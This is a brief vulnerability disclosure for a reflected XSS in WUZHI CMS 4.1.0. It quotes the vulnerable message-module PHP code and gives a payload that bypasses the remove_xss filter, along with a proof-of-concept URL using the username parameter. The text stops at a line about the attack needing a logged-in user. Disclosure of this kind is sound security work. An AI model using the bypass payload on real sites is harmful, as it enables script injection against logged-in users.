A xss vulnerability was discovered in WUZHI CMS 4.1.0
There is a reflected XSS vulnerability which allows remote attackers to inject arbitrary web script or HTML via the username parameter of /index.php?m=message&f=message&v=add
Vulnerability file: coreframe/app/message/message.php
public function add() {
$seo_title = '发私信';
$memberinfo = $this->memberinfo;
if(isset($GLOBALS['submit'])) {
......
} else {
$username = isset($GLOBALS['username']) ? remove_xss($GLOBALS['username']) : '';
//$result_tpl = $this->db->get_list('message_tpl', '', '*', 0, 100, 0, 'tplid DESC');
include T('message','add');
}
}
remove_xss
function can be bypassed via payload "><details/open/ontoggle=alert(1)>
PoC:
http://example.com/index.php?m=message&f=message&v=add&username="><details/open/ontoggle=alert(1)>
Triggered when the user is logged in: